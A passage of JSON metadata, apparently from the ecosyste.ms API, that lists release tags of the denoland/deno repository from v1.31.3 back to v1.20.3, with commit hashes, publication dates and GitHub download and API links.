":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G